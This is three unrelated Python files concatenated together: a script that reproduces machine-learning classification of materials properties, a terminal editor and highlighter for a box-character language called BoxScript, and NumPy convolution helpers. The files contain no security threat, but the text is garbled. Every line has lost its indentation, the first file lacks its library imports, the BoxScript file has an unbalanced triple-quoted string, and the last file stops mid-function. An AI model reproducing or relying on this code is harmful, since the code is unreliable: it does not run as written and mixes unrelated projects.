# import custom functions for vectorizing & visualizing data
import utils
from process_data import get_split
plt.rcParams.update({'font.size': 12})
all_props = ['bulk_modulus',
'thermal_conductivity',
'shear_modulus',
'band_gap',
'debye_temperature',
'thermal_expansion']
symbols = ['B', '$\\kappa$', 'G', 'E$_{\\mathrm{g}}$', 'D', '$\\alpha$']
prop_labels = ['Bulk Modulus (GPa)',
'Log$_{10}$ Thermal Conductivity $\\left(\\dfrac{\\mathrm{W}}' +
'{\\mathrm{m}\\cdot \\mathrm{K}}\\right)$',
'Shear Modulus (GPa)',
'Band Gap (eV)',
'Log$_{10}$ Debye Temperature (K)',
'Log$_{10}$ Thermal Expansion $(\\mathrm{K}^{-1})$']
arg2prop = {'bulk_modulus': 'ael_bulk_modulus_vrh',
'thermal_conductivity': 'agl_log10_thermal_conductivity_300K',
'shear_modulus': 'ael_shear_modulus_vrh',
'band_gap': 'Egap',
'debye_temperature': 'ael_log10_debye_temperature',
'thermal_expansion': 'agl_log10_thermal_expansion_300K'}
prop2label = dict([[v, k] for k, v
in zip(prop_labels, arg2prop.values())])
parser_desc = 'Reproduce the results of this work'
parser = argparse.ArgumentParser(description=parser_desc)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--properties',
type=str,
nargs='+',
metavar='Property to reproduce',
choices=all_props,
help=('example:\n\t' +
'python reproduce.py --properties bulk_modulus\n\t'))
group.add_argument('--all',
action='store_true',
help='Run through each property one at a time '
'and generate results and figures.')
args = parser.parse_args()
if not args.all:
mat_props = []
for j in args.properties:
mat_props.append(arg2prop[j])
else:
mat_props = list(map(lambda p: arg2prop[p], all_props))
print('Reproducing results for the following data:', mat_props)
def optimize_threshold(y_train_labeled, y_train_pred):
"""Given a DataFrame of labels and predictions, return the
optimal threshold for a high F1 score"""
y_train_ = y_train_labeled.copy()
y_train_pred_ = pd.Series(y_train_pred).copy()
f1score_max = 0
for threshold in np.arange(0.1, 1, 0.1):
diff = (max(y_train_pred) - min(y_train_pred))
threshold = min(y_train_pred) + threshold * diff
y_train_pred_[y_train_pred < threshold] = 0
y_train_pred_[y_train_pred >= threshold] = 1
f1score = f1_score(y_train_, y_train_pred_)
if f1score > f1score_max:
f1score_max = f1score
opt_thresh = threshold
return opt_thresh
def get_performance(mat_props, seed):
metrics_dict = {}
for mat_prop in mat_props:
os.makedirs('figures/'+mat_prop, exist_ok=True)
data = get_split(mat_prop, elem_prop='oliynyk', seed_num=seed)
X_train_scaled, X_test_scaled = data[0:2]
y_train, y_test = data[2:4]
y_train_labeled, y_test_labeled = data[4:6]
formula_train, formula_test = data[6:8]
test_threshold = y_test.iloc[-y_test_labeled.sum().astype(int)]
train_threshold = y_train.iloc[-y_train_labeled.sum().astype(int)]
y = pd.concat([y_train, y_test])
plt.figure(1, figsize=(7, 7))
ax = sns.distplot(y, bins=50, kde=False)
rect1 = patches.Rectangle((test_threshold, 0),
ax.get_xlim()[1]-test_threshold,
ax.get_ylim()[1], linewidth=1,
edgecolor='k',
facecolor='g',
alpha=0.2)
ax.add_patch(rect1)
text_size = 18
ax.text(.1,
.5,
'Ordinary\nCompounds',
size=text_size,
horizontalalignment='left',
verticalalignment='center',
transform=ax.transAxes)
ax.text(.98,
.15,
'Extraordinary\nCompounds',
size=text_size,
horizontalalignment='right',
verticalalignment='center',
transform=ax.transAxes)
ax.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True,
labelsize=text_size)
ax.set_xlabel(prop2label[mat_prop], size=text_size)
ax.set_ylabel('number of occurrences'.title(), size=text_size)
plt.savefig('figures/' + mat_prop + '/distplot',
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a Ridge Regression (linear model)
# define ridge regression object
rr = Ridge()
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
parameter_candidates = {'alpha': np.logspace(-5, 2, 10)}
# define the grid search
grid = GridSearchCV(estimator=rr,
param_grid=parameter_candidates,
cv=cv)
# run grid search
grid.fit(X_train_scaled, y_train)
# plot grid search to ensure good values)
utils.plot_1d_grid_search(grid, midpoint=0.75)
print('best parameters:', grid.best_params_)
plt.savefig('figures/' + mat_prop + '/rr_1d_search',
dpi=300,
bbox_inches='tight')
plt.clf()
best_params_rr = grid.best_params_
# best_params_rr = {'alpha': 0.0021544346900318843}
rr = Ridge(**best_params_rr)
rr.fit(X_train_scaled, y_train)
y_test_predicted_rr = rr.predict(X_test_scaled)
y_train_predicted_rr = rr.predict(X_train_scaled)
# plot the data
plt.figure(figsize=(6, 6))
plt.plot(y_test,
y_test_predicted_rr,
marker='o',
mfc='none',
color='#0077be',
linestyle='none',
label='test')
plt.plot(y_train,
y_train_predicted_rr,
marker='o',
mfc='none',
color='#e34234',
linestyle='none',
label='train')
max_val = max(y_test.max(), y_test_predicted_rr.max())
min_val = min(y_test.min(), y_test_predicted_rr.min())
plt.plot([min_val, max_val], [min_val, max_val], 'k--')
limits = [min_val, max_val]
plt.xlim(limits)
plt.ylim(limits)
plt.xlabel('actual')
plt.ylabel('predicted')
plt.legend(loc=4)
plt.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True)
plt.savefig('figures/' + mat_prop + '/rr_act_vs_pred',
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a support vector regression (non-linear model)
# to speed up the grid search, optimize on a subsample of data
X_train_scaled_sampled = X_train_scaled.sample(500, random_state=1)
y_train_sampled = y_train.loc[X_train_scaled_sampled.index.values]
# define support vector regression object (default to rbf kernel)
svr = SVR()
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
parameter_candidates = {'C': np.logspace(2, 4, 8),
'gamma': np.logspace(-3, 1, 8)}
# define the grid search
grid = GridSearchCV(estimator=svr,
param_grid=parameter_candidates,
cv=cv)
# run grid search
grid.fit(X_train_scaled_sampled, y_train_sampled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=0.7)
plt.savefig('figures/' + mat_prop + '/svr_2d_search',
dpi=300, bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_svr = grid.best_params_
svr = SVR(**best_params_svr)
svr.fit(X_train_scaled, y_train)
y_test_predicted_svr = svr.predict(X_test_scaled)
y_train_predicted_svr = svr.predict(X_train_scaled)
# plot the data
plt.figure(figsize=(6, 6))
plt.plot(y_test,
y_test_predicted_svr,
marker='o',
mfc='none',
color='#0077be',
linestyle='none',
label='test')
plt.plot(y_train,
y_train_predicted_svr,
marker='o',
mfc='none',
color='#e34234',
linestyle='none',
label='train')
max_val = max(y_test.max(), y_test_predicted_svr.max())
min_val = min(y_test.min(), y_test_predicted_svr.min())
plt.plot([min_val, max_val], [min_val, max_val], 'k--')
limits = [min_val, max_val]
plt.xlim(limits)
plt.ylim(limits)
plt.xlabel('actual')
plt.ylabel('predicted')
plt.legend(loc=4)
plt.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True)
plt.savefig('figures/' + mat_prop + '/svr_act_vs_pred',
dpi=300,
bbox_inches='tight')
plt.clf()
# # Approach the problem as a classification task
# ## Learn with a logistic regression (linear classification)
# define logistic regression object
lr = LogisticRegression(solver='lbfgs')
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
class_1_weight = [{0: 1, 1: weight} for weight in
np.linspace(1, 50, 5)]
parameter_candidates = {'C': np.logspace(-1, 4, 5),
'class_weight': class_1_weight}
# define the grid search. We use log-loss to decide which
# parameters to use.
grid = GridSearchCV(estimator=lr,
param_grid=parameter_candidates,
scoring='neg_log_loss',
cv=cv)
# run grid search
grid.fit(X_train_scaled, y_train_labeled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=-0.05, vmin=-0.13, vmax=0)
plt.savefig('figures/' + mat_prop + '/lr_2d_search',
dpi=300,
bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_lr = grid.best_params_
lr = LogisticRegression(solver='lbfgs', penalty='l2', **best_params_lr)
lr.fit(X_train_scaled, y_train_labeled)
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
y_pred_train_lr = cross_val_predict(lr,
X_train_scaled,
y_train_labeled,
cv=cv)
y_prob_train_lr = cross_val_predict(lr,
X_train_scaled,
y_train_labeled,
cv=cv,
method='predict_proba')
y_probability_train_lr = [probability[1] for probability in
y_prob_train_lr]
y_prob_test_lr = lr.predict_proba(X_test_scaled)
y_probability_test_lr = [probability[1] for probability in
y_prob_test_lr]
df_cm = pd.DataFrame(confusion_matrix(y_train_labeled,
y_pred_train_lr))
ax = sns.heatmap(df_cm,
square=True,
annot=True,
annot_kws={"size": 18},
cbar=False,
linewidths=.5,
cmap="YlGnBu",
center=-10000000)
ax.set_ylabel('actual')
ax.set_xlabel('predicted')
ax.xaxis.tick_top()
plt.savefig('figures/' + mat_prop + '/lr_cm',
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = 0.5
utils.plot_prob(threshold,
y_train,
y_probability_train_lr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/lr_train_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ### Check our perfromance on the test set!
utils.plot_prob(threshold,
y_test,
y_probability_test_lr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/lr_test_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ### Compare this performance to regression models
#
# **For the same recall, we are three times more likely that predicted
# compound is not actually extraordinary.**
threshold = optimize_threshold(y_train_labeled, y_train_predicted_rr)
utils.plot_regression(threshold,
y_train,
y_train_predicted_rr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/rr_train_reg_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_regression(threshold,
y_test,
y_test_predicted_rr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/rr_test_reg_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = optimize_threshold(y_train_labeled, y_train_predicted_svr)
utils.plot_regression(threshold,
y_train,
y_train_predicted_svr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svr_train_reg_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_regression(threshold,
y_test,
y_test_predicted_svr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svr_test_reg_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a support vector classification (non-linear)
# to speed up the grid search, optimize on a subsample of data
index_location = X_train_scaled_sampled.index.values
y_train_labeled_sampled = y_train_labeled.loc[index_location]
# define suppor vector classification object
# (need to set probability to True)
svc = SVC(probability=True)
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space (we will start with class_weight=1
# as that was optimal for svc)
parameter_candidates = {'C': np.logspace(-1, 4, 5),
'gamma': np.logspace(-2, 2, 5)}
# define the grid search. We use log-loss to decide
# which parameters to use.
grid = GridSearchCV(estimator=svc,
param_grid=parameter_candidates,
scoring='neg_log_loss',
cv=cv)
# run grid search
grid.fit(X_train_scaled_sampled, y_train_labeled_sampled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=-0.04, vmin=-0.13, vmax=0)
plt.savefig('figures/' + mat_prop +
'/svc_2d_search.png',
dpi=300,
bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_svc = grid.best_params_
svc = SVC(probability=True, **best_params_svc)
svc.fit(X_train_scaled, y_train_labeled)
cv = KFold(n_splits=5, shuffle=True, random_state=1)
y_pred_train_svc = cross_val_predict(svc,
X_train_scaled,
y_train_labeled,
cv=cv)
y_prob_train_svc = cross_val_predict(svc,
X_train_scaled,
y_train_labeled,
cv=cv,
method='predict_proba')
y_probability_train_svc = [probability[1] for probability in
y_prob_train_svc]
y_prob_test_svc = svc.predict_proba(X_test_scaled)
y_probability_test_svc = [probability[1] for probability in
y_prob_test_svc]
metrics = precision_recall_fscore_support(y_train_labeled,
y_pred_train_svc)
precision, recall, fscore, support = metrics
print('precision: {:0.2f}\nrecall: {:0.2f}'.format(precision[1],
recall[1]))
df_cm = pd.DataFrame(confusion_matrix(y_train_labeled,
y_pred_train_svc))
ax = sns.heatmap(df_cm,
square=True,
annot=True,
annot_kws={"size": 18},
cbar=False,
linewidths=0.5,
cmap="YlGnBu",
center=-10000000)
ax.set_ylabel('actual')
ax.set_xlabel('predicted')
ax.xaxis.tick_top()
plt.savefig('figures/' + mat_prop +
'/svc_cm',
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = 0.5
utils.plot_prob(threshold,
y_train,
y_probability_train_svc,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svc_train_prob_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_prob(threshold,
y_test,
y_probability_test_svc,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svc_test_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
metrics_dict[mat_prop] = {'precision': [], 'recall': [], 'f1': []}
threshold = optimize_threshold(y_train_labeled, y_train_predicted_rr)
y_pred_rr = [1 if x >= threshold else 0 for x in y_test_predicted_rr]
threshold = optimize_threshold(y_train_labeled, y_train_predicted_svr)
y_pred_svr = [1 if x >= threshold else 0 for x in y_test_predicted_svr]
threshold = 0.5
y_pred_lr = [1 if x >= threshold else 0 for x in y_probability_test_lr]
threshold = 0.5
y_pred_svc = [1 if x >= threshold else 0 for x in
y_probability_test_svc]
predictions = [y_pred_rr,
y_pred_svr,
y_pred_lr,
y_pred_svc]
for prediction in predictions:
print(classification_report(y_test_labeled, prediction))
metrics = precision_recall_fscore_support(y_test_labeled,
prediction)
precision, recall, f1, support = metrics
if precision[1] == 0:
if precision == 10:
pass
metrics_dict[mat_prop]['precision'].append(precision[1])
metrics_dict[mat_prop]['recall'].append(recall[1])
metrics_dict[mat_prop]['f1'].append(f1[1])
return metrics_dict
def build_metrics():
for seed in [1]:
metrics = get_performance(mat_props, seed)
for prop in metrics:
metric_csv = prop+'_metrics_seed_{:0.0f}.csv'.format(seed)
computed_metrics = os.listdir('data/metrics/')
if metric_csv in computed_metrics:
continue
else:
df_prop_metric = pd.DataFrame(metrics[prop],
index=['rr', 'svr', 'lr', 'svc'])
df_prop_metric.to_csv('data/metrics/'+metric_csv)
def plot_metrics():
metric_mean = {}
metric_std = {}
metric_mean[0] = {}
metric_mean[1] = {}
metric_mean[2] = {}
metric_std[0] = {}
metric_std[1] = {}
metric_std[2] = {}
for prop in mat_props:
rr = []
svr = []
lr = []
svc = []
for seed in [1, 2, 3, 4, 5]:
metric_csv = prop+'_metrics_seed_{:0.0f}.csv'.format(seed)
df_prop_metric = pd.read_csv('data/metrics/'+metric_csv)
rr.append(df_prop_metric.iloc[0, 1:].tolist())
svr.append(df_prop_metric.iloc[1, 1:].tolist())
lr.append(df_prop_metric.iloc[2, 1:].tolist())
svc.append(df_prop_metric.iloc[3, 1:].tolist())
for i in [0, 1, 2]:
metric_mean[i][prop] = [pd.DataFrame(rr).mean()[i],
pd.DataFrame(svr).mean()[i],
pd.DataFrame(lr).mean()[i],
pd.DataFrame(svc).mean()[i]]
metric_std[i][prop] = [pd.DataFrame(rr).std()[i],
pd.DataFrame(svr).std()[i],
pd.DataFrame(lr).std()[i],
pd.DataFrame(svc).std()[i]]
df_p_mean = pd.DataFrame(metric_mean[0], index=['rr', 'svr', 'lr', 'svc'])
df_p_std = pd.DataFrame(metric_std[0], index=['rr', 'svr', 'lr', 'svc'])
df_r_mean = pd.DataFrame(metric_mean[1], index=['rr', 'svr', 'lr', 'svc'])
df_r_std = pd.DataFrame(metric_std[1], index=['rr', 'svr', 'lr', 'svc'])
df_f_mean = pd.DataFrame(metric_mean[2], index=['rr', 'svr', 'lr', 'svc'])
df_f_std = pd.DataFrame(metric_std[2], index=['rr', 'svr', 'lr', 'svc'])
plt.rcParams.update({'font.size': 12})
means = [df_p_mean, df_r_mean, df_f_mean]
stds = [df_p_std, df_r_std, df_f_std]
metric_type = ['Precision', 'Recall', 'F1-Score']
i = 0
f, (ax1, ax2, ax3) = plt.subplots(3, 1, sharey=False, figsize=(7, 9))
f.subplots_adjust(hspace=.05, wspace=1)
axes = [ax1, ax2, ax3]
colors = ['#d7191c', '#fdae61', '#abdda4', '#2b83ba']
prop_loc = [1, 2, 3, 4, 5, 6]
for df_mean, df_std, ax in zip(means, stds, axes):
alpha = 0.15
ax.fill_between(prop_loc,
df_mean.loc['rr']+df_std.loc['rr'],
df_mean.loc['rr']-df_std.loc['rr'],
color=colors[0],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['svr']+df_std.loc['svr'],
df_mean.loc['svr']-df_std.loc['svr'],
color=colors[3],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['lr']+df_std.loc['lr'],
df_mean.loc['lr']-df_std.loc['lr'],
color=colors[2],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['svc']+df_std.loc['svc'],
df_mean.loc['svc']-df_std.loc['svc'],
color=colors[1],
alpha=alpha)
ax.plot(prop_loc, df_mean.loc['rr'], '-x', color=colors[0],
linewidth=2, label='Ridge')
ax.plot(prop_loc, df_mean.loc['svr'], '-s', color=colors[3],
linewidth=2, label='SVR')
ax.plot(prop_loc, df_mean.loc['lr'], '--d', color=colors[2],
linewidth=3, label='Logistic')
ax.plot(prop_loc, df_mean.loc['svc'], '--*', color=colors[1],
linewidth=3, label='SVC')
ax.set_ylabel(metric_type[i])
ax.tick_params(top=True, right=True, direction='in', length=6)
if i == 0:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
if i == 1:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
ax.legend(loc=4, fancybox=True, framealpha=0.3)
if i == 2:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
i += 1
plt.xticks(np.array(prop_loc), labels=[prop for prop in symbols],
rotation=0, ha='center', rotation_mode='anchor')
plt.savefig('figures/metrics.png', dpi=300, bbox_inches='tight')
if __name__ == '__main__':
build_metrics()
|
import math
from blessed import Terminal
from rich.console import Console
from rich.highlighter import RegexHighlighter
from rich.panel import Panel
from rich.style import Style
from rich.text import Text
from rich.theme import Theme
from boxscript.interpreter import Interpreter
co = Console()
class BoxScriptHighlighter(RegexHighlighter):
"""Highlighter for BS syntax"""
base_style = "token."
highlights = [
r"(?P<border>[─━│┃┌┍┎┏┐┑┒┓└┗┘┛├┞┟┡┢┣┤┦┧┩┪┫])",
r"(?P<op>[▨▧▤▥▔░▒▓▚▞▦▩◈])",
r"(?P<number>[▄▀▣]*)",
r"(?P<memory>◇[▄▀▣]*)",
r"(?P<io>[▭▯])",
r"(?P<paren>[▕▏])",
r"(?P<comment>║[^\n]*║|[╔╚]═*[╗╝])",
]
if __name__ == "__main__":
# please customize this!
theme = Theme(
{
"token.border": "#ffffff",
"token.op": "#edb9b6",
"token.number": "#d5b6ed",
"token.memory": "#b6edb9",
"token.io": "#b6eaed",
"token.paren": "#b9b6ed",
"token.comment": "#18191c",
}
)
t = Text(
"""
╔═══════════════════════╗
║This code does nothing ║
╚═══════════════════════╝
┏━━━━━━━━━━━━━━━━┓
┃◇▀▄▒▀▀▄▀▄ ┃
┡━━━━━━━━━━━━━━━━┩
│◇▀▀◈◇▀▄▒▀▀▀▄▄▄▄ │
│◇▀▀▄◈◇▀▄░▀▀▀▄▄▄▄│
│┏━━━━━━━━━━━━━┓ │
│┃◇▀▀▄ ┃ │
│┡━━━━━━━━━━━━━┩ │
││◇▀▀▀◈◇▀▀▄▚▀▀ │ │
││◇▀▀▄◈◇▀▀░◇▀▀▀│ │
││◇▀▀◈◇▀▀▒◇▀▀▀ │ │
│└─────────────┘ │
│╔═════════════╗ │
│║Test [orange]║ │
│╚═════════════╝ │
│▭◇▀▀ │
├────────────────┤
│◇▀▀◈◇▀▄░▀▀ │
│◇▀▄◈◇▀▄▒▀▀ │
│┏━━━━━━━━━━━━┓ │
│┃◇▀▀ ┃ │
│┡━━━━━━━━━━━━┩ │
││◇▀▀▄◈◇▀▀▚▀▀ │ │
││◇▀▀◈◇▀▄░◇▀▀▄│ │
││◇▀▄◈◇▀▄▒◇▀▀▄│ │
│└────────────┘ │
└────────────────┘
"""
"""
)
BoxScriptHighlighter().highlight(t)
Console(theme=theme).print(
Panel(t,
highlight=True,
title="test.bs",
width=50,
height=75,
style=Style(bgcolor="#36393f")
)
)
"""
)
term = Terminal()
dictofletters = {
"q": "│",
"a": "┃",
"z": "║",
"w": "─",
"s": "━",
"x": "═",
"e": "┌",
"r": "┐",
"t": "└",
"y": "┘",
"d": "┏",
"f": "┓",
"g": "┗",
"h": "┛",
"c": "╔",
"v": "╗",
"b": "╚",
"n": "╝",
"1": "├",
"2": "┤",
"3": "┞",
"4": "┦",
"5": "┟",
"6": "┧",
"7": "┣",
"8": "┫",
"9": "┡",
"0": "┩",
"-": "┢",
"=": "┪",
"_": "╠",
"+": "╣",
"(": "▄",
")": "▀",
"[": "◇",
"]": "◈",
"u": "▔",
"i": "░",
"o": "▒",
"p": "▓",
"j": "▚",
"k": "▞",
"l": "▕",
";": "▏",
"{": "▭",
"}": "▯",
"m": "▖",
",": "▗",
".": "▘",
"/": "▝",
"'": "▌",
'"': "▐",
"<": "▧",
">": "▨",
"?": "▤",
"|": "▥",
}
def main() -> None:
"""Main function."""
row_length = 10
max_row_length = math.floor(term.width / 2)
print(f"{term.home}{term.white_on_black}{term.clear}")
print("press '~' to quit.")
with term.cbreak(): # While you are pressing buttons
val = ""
ll = ""
# max_row_length = len(val)
while ll.lower() != "~": # While the button is not ~
ll = term.inkey()
if val.count("\n") == 0:
max_row_length = len(val)
if ll.name == "KEY_BACKSPACE": # Delete Char
val = val[:-1]
elif ll.name == "KEY_ENTER": # New line
val += "\n"
if row_length > max_row_length:
max_row_length = row_length
row_length = 0
else:
val += dictofletters.get(ll, ll) # Write Char
row_length += 1
print(f"{term.clear}")
Console(theme=theme).print(
Panel(
val,
highlight=True,
title="test.bs",
width=max_row_length,
style=Style(bgcolor="#36393f"),
)
)
print(f"{term.normal}")
print(val)
return val
Interpreter().run(main())
|
import matplotlib
matplotlib.use("Agg")
from imageio import imread
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import scipy.signal as sg
import scipy as sp
def get_im2col_indices(x_shape, field_height, field_width, padding=1, stride=1):
# from cs231n assignments
# First figure out what the size of the output should be
N, C, H, W = x_shape
assert (H + 2 * padding - field_height) % stride == 0
assert (W + 2 * padding - field_width) % stride == 0
out_height = (H + 2 * padding - field_height) / stride + 1
out_width = (W + 2 * padding - field_width) / stride + 1
i0 = np.repeat(np.arange(field_height), field_width)
i0 = np.tile(i0, C)
i1 = stride * np.repeat(np.arange(out_height), out_width)
j0 = np.tile(np.arange(field_width), field_height * C)
j1 = stride * np.tile(np.arange(out_width), out_height)
i = i0.reshape(-1, 1) + i1.reshape(1, -1)
j = j0.reshape(-1, 1) + j1.reshape(1, -1)
k = np.repeat(np.arange(C), field_height * field_width).reshape(-1, 1)
return (k, i, j)
def im2col_indices(x, field_height, field_width, padding=1, stride=1):
# from cs231n assignments
""" An implementation of im2col based on some fancy indexing """
# Zero-pad the input
p = padding
x_padded = np.pad(x, ((0, 0), (0, 0), (p, p), (p, p)), mode='constant')
k, i, j = get_im2col_indices(x.shape, field_height, field_width, padding,
stride)
cols = x_padded[:, k, i, j]
C = x.shape[1]
cols = cols.transpose(1, 2, 0).reshape(field_height * field_width * C, -1)
return cols
def col2im_indices(cols, x_shape, field_height=3, field_width=3, padding=1,
stride=1):
# from cs231n assignments
""" An implementation of col2im based on fancy indexing and np.add.at """
N, C, H, W = x_shape
H_padded, W_padded = H + 2 * padding, W + 2 * padding
x_padded = np.zeros((N, C, H_padded, W_padded), dtype=cols.dtype)
k, i, j = get_im2col_indices(x_shape, field_height, field_width, padding,
stride)
cols_reshaped = cols.reshape(C * field_height * field_width, -1, N)
cols_reshaped = cols_reshaped.transpose(2, 0, 1)
np.add.at(x_padded, (slice(None), k, i, j), cols_reshaped)
if padding == 0:
return x_padded
return x_padded[:, :, padding:-padding, padding:-padding]
# really, really useful reference
# http://wiseodd.github.io/techblog/2016/07/16/convnet-conv-layer/
def conv2(x, w, b, pad="same", stride=1, dilation=1, cut=True):
if pad == "same":
pad = max(w.shape[-1] // 2 - 1, 1)
if dilation != 1:
assert stride == 1
assert cut
n_filt, d_filt, h_filt, w_filt = w.shape
N, C, H, W = x.shape
h_stride_check = (H + 2 * pad - h_filt) % stride
if h_stride_check != 0:
if h_stride_check % 2 == 0:
x = x[:, :, h_stride_check // 2:-h_stride_check // 2, :]
elif h_stride_check // 2 >= 1:
x = x[:, :, h_stride_check // 2:-h_stride_check // 2, :]
elif h_stride_check // 2 == 0:
x = x[:, :, 1:, :]
else:
raise ValueError("Check x")
N, C, H, W = x.shape
h_stride_check = (H + 2 * pad - h_filt) % stride
assert h_stride_check == 0
w_stride_check = (W + 2 * pad - w_filt) % stride
if w_stride_check != 0:
if w_stride_check % 2 == 0:
x = x[:, :, :, w_stride_check // 2:-w_stride_check // 2 + 1]
elif w_stride_check // 2 >= 1:
x = x[:, :, :, w_stride_check // 2:-w_stride_check // 2]
elif h_stride_check // 2 == 0:
x = x[:, :, :, 1:]
else:
raise ValueError("Check y")
N, C, H, W = x.shape
w_stride_check = (W + 2 * pad - w_filt) % stride
assert w_stride_check == 0
if dilation != 1:
h_dilation_check = H % dilation
w_dilation_check = W % dilation
if h_dilation_check != 0:
if h_dilation_check // 2 >= 1:
x = x[:, :, h_dilation_check // 2:-h_dilation_check // 2, :]
else:
x = x[:, :, 1:, :]
if w_dilation_check != 0:
if w_dilation_check // 2 >= 1:
x = x[:, :, :, w_dilation_check // 2:-w_dilation_check // 2]
elif w_dilation_check // 2 == 0:
x = x[:, :, :, 1:]
# space -> batch
# NCHW
N, C, H, W = x.shape
assert H % dilation == 0
assert W % dilation == 0
# WCNH
x = x.transpose(3, 1, 0, 2)
new_N = dilation * N
new_H = H // dilation
x = x.reshape(W, C, new_N, new_H)
# HCNW
x = x.transpose(3, 1, 2, 0)
new_W = W // dilation
new_N = dilation * new_N
x = x.reshape(new_H, C, new_N, new_W)
# NCHW
x = x.transpose(2, 1, 0, 3)
n_x, d_x, h_x, w_x = x.shape
h_out = (h_x - h_filt + 2 * pad) // stride + 1
w_out = (w_x - w_filt + 2 * pad) // stride + 1
assert h_out == int(h_out)
assert w_out == int(w_out)
h_out = int(h_out)
w_out = int(w_out)
x_col = im2col_indices(x, h_filt, w_filt, padding=pad, stride=stride)
w_col = w.reshape(n_filt, -1)
if b is None:
out = np.dot(w_col, x_col)
else:
out = np.dot(w_col, x_col) + b[:, None]
out = out.reshape(n_filt, h_out, w_out, n_x)
out = out.transpose(3, 0, 1, 2)
if dilation != 1:
#check the dims as being square
# space -> batch
# NCHW
N, C, H, W = out.shape
# HCNW
out = out.transpose(2, 1, 0, 3)
new_N = N // dilation
new_W = W * dilation
out = out.reshape(H, C, new_N, new_W)
# WCNH
out = out.transpose(3, 1, 2, 0)
new_H = H * dilation
new_N = new_N // dilation
out = out.reshape(new_W, C, new_N, new_H)
# NCHW
out = out.transpose(2, 1, 3, 0)
return out
def _to_bc_h_w_2(o):
shp = o.shape
o = o.transpose(2, 3, 0, 1)
o = o.reshape((shp[2], shp[3], shp[0] * shp[1] // 2, 2))
# bc h w 2
return o.transpose(2, 0, 1, 3)
def _to_bc_h_w(x):
shp = x.shape
x = x.transpose(2, 3, 0, 1)
x = x.reshape((shp[2], shp[3], shp[0] * shp[1]))
return x.transpose(2, 0, 1)
def _to_b_c_h_w(x_o, shp):
x_n = x_o.transpose(1, 2, 0)
x_n = x_n.reshape((shp[2], shp[3], shp[0], shp[1]))
return x_n.transpose(2, 3, 0, 1)
def conv_offset2(x, w, pad="same"):
x_shape = x.shape
o_offsets = conv2(x, w, None, pad="same")
# clip these offsets?
offsets = _to_bc_h_w_2(o_offsets)
x_r = _to_bc_h_w(x)
x_offset = np_batch_map_offsets(x_r, offsets)
x_offset = _to_b_c_h_w(x_offset, x_shape)
shp = o_offsets.shape
o_offsets = o_offsets.transpose(0, 2, 3, 1).reshape((shp[0], shp[2], shp[3], shp[1] // 2, 2))
o_offsets = o_offsets.transpose(0, 3, 1, 2, 4)
return x_offset, o_offsets
def mid_crop(arr, crop_h, crop_w):
n, c, h, w = arr.shape
if h < crop_h:
raise ValueError("Can't crop larger crop_h")
if w < crop_w:
raise ValueError("Can't crop larger crop_w")
diff_h = abs(crop_h - h)
diff_w = abs(crop_w - w)
out = arr
if diff_h == 0:
out = out
elif diff_h == 1:
out = out[:, :, 1:, :]
elif diff_h % 2 == 0:
out = out[:, :, diff_h // 2:-diff_h // 2, :]
else:
out = out[:, :, diff_h // 2:-diff_h // 2, :]
if diff_w == 0:
out = out
elif diff_w == 1:
out = out[:, :, :, 1:]
elif diff_w % 2 == 0:
out = out[:, :, :, diff_w // 2:-diff_w // 2]
else:
out = out[:, :, :, diff_w // 2:-diff_w // 2]
return out
def crop_match(*args):
min_h = np.inf
min_w = np.inf
for arg in args:
